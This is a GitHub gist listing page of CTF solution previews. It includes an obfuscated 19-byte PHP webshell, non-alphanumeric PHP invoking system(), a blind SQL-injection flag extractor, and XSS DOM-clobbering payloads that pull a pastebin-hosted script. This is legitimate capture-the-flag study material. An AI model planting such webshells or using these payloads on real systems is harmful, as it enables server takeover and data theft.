Skip to content

Instantly share code, notes, and snippets.

Avatar

terjanq

View GitHub Profile
@terjanq
terjanq / README.md
Last active Oct 22, 2020
TokyoWesterns CTF 2020 | writeups by @terjanq
View README.md

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
    matches = app.re_ip.match(ip)
@terjanq
terjanq / scriptless_solve.html
Last active Jun 13, 2020
Solution to Scriptless challenge from Pwn2win 2020 CTF
View scriptless_solve.html
<body>
</body>
<script>
/*
Quasi-scriptless (3 solves)
@terjanq
terjanq / rev_shell.php
Last active Jan 21, 2021
The shortest non-alphanumeric reverse shell script (19 bytes)
View rev_shell.php
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
View funny.php
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>
<!--
Explanation:
- Some of the characters might look like alphanumeric, but they are Unicode characters.
- 'ArrayΦ' <-> [].Φ
- 1 <-> ![]
- 'a' <-> ([].Φ)[![]+![]+![]]
@terjanq
terjanq / part1.py
Last active Apr 20, 2020
Stegasaurus Ccratch solution (PlaidCTF 2020)
View part1.py
# The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305
# Which I got from p4 team.
import random
from math import factorial
SET_SIZE = 8
MAX_VAL = 40000
# get random 8 integers
@terjanq
terjanq / writeupBin_for_bots.py
Created Dec 29, 2019
Payload to WriteupBin hxp2019 CTF
View writeupBin_for_bots.py
from flask import Flask
import time
import requests
import os
import re
import sys
app = Flask(__name__)
@terjanq
terjanq / car_repair.js
Created Oct 24, 2019
Solutions from hacklu 2019 CTF
View car_repair.js
/*
* This is a solution to "Car repair shop" challenge from hack.lu ctf 2019
* Solves: 9
* 10/23/2019 © by terjanq
*/
/* The idea of the solution is: */
function WoW(){ this.Oo = 'O.o'; }
var x = new WoW();
@terjanq
terjanq / exploit.js
Last active Jan 12, 2020
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
View exploit.js
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'
// Generates definitions for fonts
function generateFonts() {
@terjanq
terjanq / solution-225.html
Last active Sep 25, 2019
XSS Challenge DOM Clobbering
View solution-225.html
<!-- 225 char solution (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=testPath name=test>
@terjanq
terjanq / solution-214.html
Created Sep 23, 2019
XSS Challenge DOM Clobbering
View solution-214.html
<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=test>
<a>